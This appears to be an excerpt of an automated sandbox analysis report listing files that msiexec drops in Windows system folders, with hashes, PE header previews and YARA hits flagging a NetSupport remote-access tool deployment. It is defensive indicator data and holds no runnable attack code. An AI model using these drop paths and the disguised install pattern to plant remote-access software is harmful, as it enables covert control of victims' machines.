                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI2B06.tmp, Author: Joe Security
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI2B65.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI2B65.tmp, Author: Joe Security
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI2B95.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI2B95.tmp, Author: Joe Security
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI2BE4.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):763872
                                                                                                                    Entropy (8bit):6.574853256300612
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:UwBfoW/SGOLyn5PmPgLmkgM2uyIXEFH9YI/WIvSGvmm5s3qGGaG6rn5ax77/v10E:F6IqkgM2uyIqH93/WIvOqMR/YfMl2eTS
                                                                                                                    MD5:0FCF65C63E08E77732224B2D5D959F13
                                                                                                                    SHA1:5419B79FE14E21D1D5B51FE8187F7B86EC20DE74
                                                                                                                    SHA-256:F3E587F94A79C46A603B39286E93B17FABC895C6B71B26B0FC5D812CF155B7E5
                                                                                                                    SHA-512:7C289AAF3AC1B998C8CA9593A58C8AA3A9AA9F41852C1ED4192B908E0AD51871400D585B4FE508D49368BDFC7378807D289971914870A7A47B0410A946E5E381
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI2BE4.tmp, Author: Joe Security
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)..H.H.H.3.l..H..>j..H.0w..H.0g..H.H..>I..>^..H..>_..H..>o..H..>n..H..>i..H.Rich.H.................PE..L.....oe.................t........................@..........................0............@..........................c.......@..,....P..(Y...........J...]......Lo.. ...................................@...............\....=..@....................text....s.......t.................. ..`.rdata..t............x..............@..@.data...@....p...0...N..............@....rsrc...(Y...P...Z...~..............@..@.reloc...p.......r..................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI2E95.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):250616
                                                                                                                    Entropy (8bit):6.25532114530443
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:JW17KIRjMhp0/dy1uKS8CEZv41XYZlhIz:hIRghpmE1uKS8NyVYZlhIz
                                                                                                                    MD5:C4CA339BC85AAE8999E4B101556239DD
                                                                                                                    SHA1:D090FC385E0002E35DB276960A360C67C4FC85CD
                                                                                                                    SHA-256:4AB23609CDC64D10B97C9CCB285ED7100F55D54D983CD50762DA25ECAC4357F9
                                                                                                                    SHA-512:9185EC32545FC838D7FEF6C9E4DD222DD02114C661B0B344F16287D55E6571BFE7A4233A852ACC579D07BCDBAB18C5C034C465B1F4BB78535ED51C3499087FE0
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|.../.../.../n$./.../=%./.../n$./.../n$./.../..L/.../..\/.../.../.../=%./.../=%./.../=%./.../..X/.../=%./.../Rich.../................PE..L.....Y...........!.....\...x......V........p.......................................H..............................PK......,=......................................................................`...@............p...............................text...MZ.......\.................. ..`.rdata.......p.......`..............@..@.data...4:...P.......>..............@....rsrc................X..............@..@.reloc...V.......X...^..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI3FCC.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):763872
                                                                                                                    Entropy (8bit):6.574853256300612
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:UwBfoW/SGOLyn5PmPgLmkgM2uyIXEFH9YI/WIvSGvmm5s3qGGaG6rn5ax77/v10E:F6IqkgM2uyIqH93/WIvOqMR/YfMl2eTS
                                                                                                                    MD5:0FCF65C63E08E77732224B2D5D959F13
                                                                                                                    SHA1:5419B79FE14E21D1D5B51FE8187F7B86EC20DE74
                                                                                                                    SHA-256:F3E587F94A79C46A603B39286E93B17FABC895C6B71B26B0FC5D812CF155B7E5
                                                                                                                    SHA-512:7C289AAF3AC1B998C8CA9593A58C8AA3A9AA9F41852C1ED4192B908E0AD51871400D585B4FE508D49368BDFC7378807D289971914870A7A47B0410A946E5E381
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI3FCC.tmp, Author: Joe Security
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)..H.H.H.3.l..H..>j..H.0w..H.0g..H.H..>I..>^..H..>_..H..>o..H..>n..H..>i..H.Rich.H.................PE..L.....oe.................t........................@..........................0............@..........................c.......@..,....P..(Y...........J...]......Lo.. ...................................@...............\....=..@....................text....s.......t.................. ..`.rdata..t............x..............@..@.data...@....p...0...N..............@....rsrc...(Y...P...Z...~..............@..@.reloc...p.......r..................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI4C31.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):250616
                                                                                                                    Entropy (8bit):6.25532114530443
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:JW17KIRjMhp0/dy1uKS8CEZv41XYZlhIz:hIRghpmE1uKS8NyVYZlhIz
                                                                                                                    MD5:C4CA339BC85AAE8999E4B101556239DD
                                                                                                                    SHA1:D090FC385E0002E35DB276960A360C67C4FC85CD
                                                                                                                    SHA-256:4AB23609CDC64D10B97C9CCB285ED7100F55D54D983CD50762DA25ECAC4357F9
                                                                                                                    SHA-512:9185EC32545FC838D7FEF6C9E4DD222DD02114C661B0B344F16287D55E6571BFE7A4233A852ACC579D07BCDBAB18C5C034C465B1F4BB78535ED51C3499087FE0
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|.../.../.../n$./.../=%./.../n$./.../n$./.../..L/.../..\/.../.../.../=%./.../=%./.../=%./.../..X/.../=%./.../Rich.../................PE..L.....Y...........!.....\...x......V........p.......................................H..............................PK......,=......................................................................`...@............p...............................text...MZ.......\.................. ..`.rdata.......p.......`..............@..@.data...4:...P.......>..............@....rsrc................X..............@..@.reloc...V.......X...^..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI51A0.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI51A0.tmp, Author: Joe Security
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI51C1.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):763872
                                                                                                                    Entropy (8bit):6.574853256300612
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:UwBfoW/SGOLyn5PmPgLmkgM2uyIXEFH9YI/WIvSGvmm5s3qGGaG6rn5ax77/v10E:F6IqkgM2uyIqH93/WIvOqMR/YfMl2eTS
                                                                                                                    MD5:0FCF65C63E08E77732224B2D5D959F13
                                                                                                                    SHA1:5419B79FE14E21D1D5B51FE8187F7B86EC20DE74
                                                                                                                    SHA-256:F3E587F94A79C46A603B39286E93B17FABC895C6B71B26B0FC5D812CF155B7E5
                                                                                                                    SHA-512:7C289AAF3AC1B998C8CA9593A58C8AA3A9AA9F41852C1ED4192B908E0AD51871400D585B4FE508D49368BDFC7378807D289971914870A7A47B0410A946E5E381
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI51C1.tmp, Author: Joe Security
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)..H.H.H.3.l..H..>j..H.0w..H.0g..H.H..>I..>^..H..>_..H..>o..H..>n..H..>i..H.Rich.H.................PE..L.....oe.................t........................@..........................0............@..........................c.......@..,....P..(Y...........J...]......Lo.. ...................................@...............\....=..@....................text....s.......t.................. ..`.rdata..t............x..............@..@.data...@....p...0...N..............@....rsrc...(Y...P...Z...~..............@..@.reloc...p.......r..................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI57BD.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):250616
                                                                                                                    Entropy (8bit):6.25532114530443
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:JW17KIRjMhp0/dy1uKS8CEZv41XYZlhIz:hIRghpmE1uKS8NyVYZlhIz
                                                                                                                    MD5:C4CA339BC85AAE8999E4B101556239DD
                                                                                                                    SHA1:D090FC385E0002E35DB276960A360C67C4FC85CD
                                                                                                                    SHA-256:4AB23609CDC64D10B97C9CCB285ED7100F55D54D983CD50762DA25ECAC4357F9
                                                                                                                    SHA-512:9185EC32545FC838D7FEF6C9E4DD222DD02114C661B0B344F16287D55E6571BFE7A4233A852ACC579D07BCDBAB18C5C034C465B1F4BB78535ED51C3499087FE0
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|.../.../.../n$./.../=%./.../n$./.../n$./.../..L/.../..\/.../.../.../=%./.../=%./.../=%./.../..X/.../=%./.../Rich.../................PE..L.....Y...........!.....\...x......V........p.......................................H..............................PK......,=......................................................................`...@............p...............................text...MZ.......\.................. ..`.rdata.......p.......`..............@..@.data...4:...P.......>..............@....rsrc................X..............@..@.reloc...V.......X...^..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI68D5.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):173816
                                                                                                                    Entropy (8bit):6.23179846686102
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:CfxQXjgrNmFy/E9XFPaKON5hqTYYPOaLId+MSBFskIvE51+VMA1:CfuzgrNW5iKQ5hdIVqdzGry
                                                                                                                    MD5:0E6FDA2B8425C9513C774CF29A1BC72D
                                                                                                                    SHA1:A79FFA24CB5956398DED44DA24793A2067B85DD0
                                                                                                                    SHA-256:E946B2FAE0B36C43064463A8C16A2774ADAC30C4188C5AF90E9338B903C501C9
                                                                                                                    SHA-512:285BB7759A1214ABED36162AC8BE2D48DF17A05278C4DE97562448E20FD43B635563A6819F37E23D92A5F5ED0205A68BFFE43DAC0D3A67513BD0303B4E7F89AA
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h`....S...S...S...S...SA..S...S...S...S...S...S.~.S...S...S...S.~.S...SA..S...SA..S...SA..S...S...S...SA..S...SRich...S........PE..L.....Y...........!.................................................................C....@..........................A..a...d4......................................................................(...@............................................text............................... ..`.rdata..............................@..@.data...41...P.......*..............@....rsrc................<..............@..@.reloc...G.......H...B..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI6914.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):523512
                                                                                                                    Entropy (8bit):6.417003633431126
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:0YyHpqomwGyh0OWYZKStlPGQvpOtC5bOPzf4tN:0YyCwGY0OtZKSvGkpOtC5Q4b
                                                                                                                    MD5:D524B639A3A088155981B9B4EFA55631
                                                                                                                    SHA1:39D8EEA673C02C1522B110829B93D61310555B98
                                                                                                                    SHA-256:03D91C8CD20B846625A092A3DAE6A12369930C65D6216A455A00449EBB0DC289
                                                                                                                    SHA-512:84F8AB54122F93A40DA08FD83BCA767AB49EB0F73C4AB274D9BDA11DD09224134DF011FA02E5A3ABBAFCC6FBEF6A60673DD48FEABDF829A1E22C85A2A759B7AC
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.o.&o..&o..&o....+o....Bo.....o../...-o..&o..\o......o.....'o.....'o..&o..'o.....'o..Rich&o..................PE..L.....Y...........!.....V..................p...............................0.......s....@..........................(..rB......x................................d...r..8...............................@............p...............................text...#T.......V.................. ..`.rdata..R....p.......Z..............@..@.data...|4...p.......V..............@....rsrc................l..............@..@.reloc..Ne.......f...z..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI6963.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:modified
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI6963.tmp, Author: Joe Security
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\SourceHash{CBB68368-7767-4CFF-B3E5-211488346702}

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):20480
                                                                                                                    Entropy (8bit):1.161422720662984
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:JSbX72FjiAGiLIlHVRpzh/7777777777777777777777777vDHFVBfHIxVYOp01z:J4QI53hoxyN8F
                                                                                                                    MD5:CD7AB3DEB405264AAA93C9CD98F2C426
                                                                                                                    SHA1:E274F2E9E3D997D8FF344DB0B056F994D32ECC05
                                                                                                                    SHA-256:74D3D772C9B7174FC3702D7835F3C2D0F61F46BD07CBC5306A03541FE9485881
                                                                                                                    SHA-512:C79294A0FD7D98FBEC8ACB0EC41601B456BBDF89D89D9DF238CFE3DDBA36472365C71E290671793EC61C9229908002E194C3C8B29C4F4987F6458043DE242E35
                                                                                                                    Malicious:false
                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):24576
                                                                                                                    Entropy (8bit):2.2099910368114806
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:ZhU1FFTFPwJZr+kZUfrWbrAiQc2IO0dqffKMuOkIrqaktfhWbrAs6P:Y1nxy4cLOUCfKMPqYw
                                                                                                                    MD5:028B4FDBCF2D91D3D240605C8D70EFF1
                                                                                                                    SHA1:C37412C478219DE8E590CBBCD7DBF89A41A919F2
                                                                                                                    SHA-256:6A89784930F481E9BC67FD4A3D734AB813F742288512BB52C15455356B89110A
                                                                                                                    SHA-512:5CC5A3A014804F5CB74D5FD0BF1AE45AB920417A8DDB3784A70F16C7B1E6C0C8EBF7A08B113FD46414D16F6DDAF32B3A349A5CB4D28E048A30087E03A4ADAB70
                                                                                                                    Malicious:false
                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\{CBB68368-7767-4CFF-B3E5-211488346702}\ARPPRODUCTICON.exe

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):144128
                                                                                                                    Entropy (8bit):4.98417021664642
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:DMAyYdTmPJbgqcnDcVVZl6FhWr80/35qr2pe/kyNAMxkEe:D1U81c50hGv5Kee/k4x6
                                                                                                                    MD5:EEA96B9571108A588FB0DBC47DB9F8BE
                                                                                                                    SHA1:3DD69D11C3023FDD9429658BA25995950781E575
                                                                                                                    SHA-256:D324F2C1E8697197152BC2E4E8AA67F8660B3B93887A754AEC81791377EF1045
                                                                                                                    SHA-512:760749F298E7E2C8E081B4A436EA1185B6366E53A5B91640061EA73A9C0AC33AB385BD0588B9886F80F695B297BA46FFC58B3BDE0DD2BC9AEA127FDDCBC0C624
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............C...C...C...C...CD..C...C...C...C=..C...C...C...C...C...CRich...C........................PE..L......Y.................@...................P....@..................................~......................................4T..(.......(k...............3...........................................................P...............................text....5.......@.................. ..`.rdata.......P.......P..............@..@.data....)...`...0...`..............@....rsrc...(k.......p..................@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):432221
                                                                                                                    Entropy (8bit):5.375163522455423
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauH:zTtbmkExhMJCIpEri
                                                                                                                    MD5:3F57B0D0EF35DE5C471C74A8B9DA62E8
                                                                                                                    SHA1:EEBCF9BAD94E334337EF4D1DBB7732F16C0964C5
                                                                                                                    SHA-256:DD017137AD6183B8F4DC53E30047C42CDF0C70C634E39F752547104580BC8521
                                                                                                                    SHA-512:F6B038DCEBD0575658C9BEECB7B7338FECEBC4BD32DFE18494DDF524D224190701A088821CF5EDA22945FE6C12D01CF5B266A36EEDFFFAEE185F37ED250C5500
                                                                                                                    Malicious:false
                                                                                                                    Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                                                                                                    C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\loca[1].htm

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):16
                                                                                                                    Entropy (8bit):3.077819531114783
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:llD:b
                                                                                                                    MD5:C40449C13038365A3E45AB4D7F3C2F3E
                                                                                                                    SHA1:CB0FC03A15D4DBCE7BA0A8C0A809D70F0BE6EB9B
                                                                                                                    SHA-256:1A6B256A325EEE54C2A97F82263A35A9EC9BA4AF5D85CC03E791471FC3348073
                                                                                                                    SHA-512:3F203E94B7668695F1B7A82BE01F43D082A8A5EB030FC296E0743027C78EAB96774AB8D3732AFE45A655585688FB9B60ED355AEE4A51A2379C545D9440DC974C
                                                                                                                    Malicious:true
                                                                                                                    Preview:40.7357,-74.1724

                                                                                                                    C:\Windows\SysWOW64\pcimsg.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\Installer\MSI3FCC.tmp
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):56288
                                                                                                                    Entropy (8bit):5.934323135362062
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:j8OV1u6Jr2pe/6QHDHf/ckSCr2pe/DryHDHf/ckI:jRee/RjHpee/KjH0
                                                                                                                    MD5:5758E67FBD1984B6E43648C8568FB4EE
                                                                                                                    SHA1:6C1CD32D27EA2719668FE1ADEBDD8AF626814007
                                                                                                                    SHA-256:2723D3EC822F369E1C083085335C86D9FD94367DDF36BB2047BBCE0DAE59AA7D
                                                                                                                    SHA-512:C3743E4499509E384E00C14C0C5467A0C2F337201C868A1426010F5A086F3B5C74A4E97D006042835902E0332D2833FCCD30ECFA9DD8D17F3AB109976B5AC6B1
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}.................................Rich....................PE..L.....oe...........!.........x............... .... .................................x.....@.......................................... ...v...........~...]...........................................................................................text............................... ..`.rsrc....v... ...x..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\System32\client32provider.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe
                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):104928
                                                                                                                    Entropy (8bit):6.462496520992136
                                                                                                                    Encrypted:false
